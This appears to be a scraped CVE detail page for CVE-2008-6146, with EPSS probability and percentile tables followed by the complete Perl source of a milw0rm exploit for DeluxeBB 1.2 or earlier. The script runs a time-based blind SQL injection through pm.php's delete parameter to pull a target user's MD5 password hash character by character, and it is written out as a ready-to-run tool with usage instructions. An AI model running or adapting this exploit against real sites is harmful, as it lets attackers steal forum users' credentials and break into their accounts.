CVE-2008-6146 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	0.99%	–	–
2022-03-13	–	–	0.99%	–	–
2022-04-03	–	–	0.99%	–	–
2022-05-29	–	–	0.99%	–	–
2022-08-14	–	–	0.99%	–	–
2022-11-13	–	–	0.99%	–	–
2022-11-20	–	–	0.99%	–	–
2022-11-27	–	–	0.99%	–	–
2023-03-05	–	–	0.99%	–	–
2023-03-12	–	–	–	0.06%	–
2023-11-05	–	–	–	0.06%	–
2023-11-12	–	–	–	0.06%	–
2023-11-19	–	–	–	0.06%	–
2023-11-26	–	–	–	0.06%	–
2024-02-11	–	–	–	0.06%	–
2024-02-18	–	–	–	0.06%	–
2024-04-14	–	–	–	0.06%	–
2024-06-02	–	–	–	0.06%	–
2024-08-25	–	–	–	0.06%	–
2024-11-24	–	–	–	0.06%	–
2024-12-08	–	–	–	0.06%	–
2024-12-22	–	–	–	0.08%	–
2025-01-12	–	–	–	0.08%	–
2025-01-19	–	–	–	0.08%	–
2025-03-18	–	–	–	–	0.37%
2025-03-30	–	–	–	–	0.37%
2025-04-15	–	–	–	–	0.37%
2025-04-15	–	–	–	–	0.37,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	18%
2022-03-13	19%
2022-04-03	34%
2022-05-29	35%
2022-08-14	36%
2022-11-13	37%
2022-11-20	36%
2022-11-27	37%
2023-03-05	38%
2023-03-12	26%
2023-11-05	27%
2023-11-12	26%
2023-11-19	27%
2023-11-26	26%
2024-02-11	25%
2024-02-18	26%
2024-04-14	27%
2024-06-02	28%
2024-08-25	29%
2024-11-24	29%
2024-12-08	3%
2024-12-22	35%
2025-01-12	36%
2025-01-19	36%
2025-03-18	57%
2025-03-30	56%
2025-04-15	58%
2025-04-15	58%

#!/usr/bin/perl # -------------------------------------------------- # DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit # -------------------------------------------------- # by athos - staker[at]hotmail[dot]it # download on http://deluxebb.com # -------------------------------------------------- # Usage: # perl xpl.pl host/path prefix id password target id # perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1 # -------------------------------------------------- # Note: magic_quotes_gpc off # don't add me on msn messenger # my email staker.38@gmail.com # -------------------------------------------------- # Greetz: str0ke,The:Paradox and #cancer # -------------------------------------------------- use strict; use Digest::MD5('md5_hex'); use LWP::UserAgent; my ($hash,$http); my ($host,$prefix,$user,$pass,$target) = @ARGV; $http = new LWP::UserAgent(timeout => 5); if (@ARGV != 5) { print "\n+----------------------------------------------------+\r", "\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r", "\n+----------------------------------------------------+\r", "\nby athos - staker[at]hotmail[dot]it\n", "\nUsage + perl $0 [host/path] [prefix] [ID] [password] [target ID]", "\nHost + localhost/DeluxeBB", "\nID + your user ID", "\nPassword + your password", "\nPrefix + table prefix (default: deluxebb)", "\nTarget ID + target id\n"; exit; } $http->default_header('Cookie' => cookies($user,$pass)); &exploit; sub getUsername { my ($user_id,$response,@nickname) = $_[0]; $response = $http->get("http://$host/misc.php?sub=profile&uid=$user_id"); @nickname = $response->as_string =~ m{<span class="misctext">(.+?)</span>}ig; return $nickname[1]; } sub cookies { my ($username); my ($user_id,$password) = @_; $username = getUsername($user_id); $password = md5_hex($password); return qq{membercookie=$username; memberid=$user_id; memberpw=$password;}; } sub getMsg { my $response = $http->get("http://$host/pm.php?sub=folder&name=inbox"); if ($response->as_string =~ m/pid=(\d+)./i) { return $1; } else { my $content = { to => getUsername($user), subject => rand(999), posticon => 'none', rte1 => rand(999), submit => 'Send' }; my $request = $http->post("http://$host/pm.php?sub=newpm",$content); my $read_id = $http->get("http://$host/pm.php?sub=folder&name=inbox"); if ($read_id->content =~ /pid=(\d+)./i) { return $1; } } } sub sql { my ($i,$j,$sql) = (shift,shift,undef); $sql = "%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),". "benchmark(200000000,CHAR(0)),0)+FROM+${prefix}_users". "+WHERE uid=$target))%23"; return $sql; } sub delay { my ($tm1,$tm2) = (undef,undef); my ($msg,$sql) = @_; $tm1 = time(); $http->get("http://$host/pm.php?sub=do&submit=Delete&delete$msg=$sql"); $tm2 = time(); return $tm2 - $tm1; } sub exploit { my ($i,$ord) = (1,undef); my @chr = (48..57, 97..102); for ($i..32) { foreach $ord(@chr) { if (delay(&getMsg,&sql($i,$ord)) >= 5) { syswrite(STDOUT,chr($ord)); $hash .= chr($ord); last; $i++; } if ($i == 2 and not defined $hash) { syswrite(STDOUT,"Exploit Failed!\n"); exit; } } } } # milw0rm.com [2008-12-28]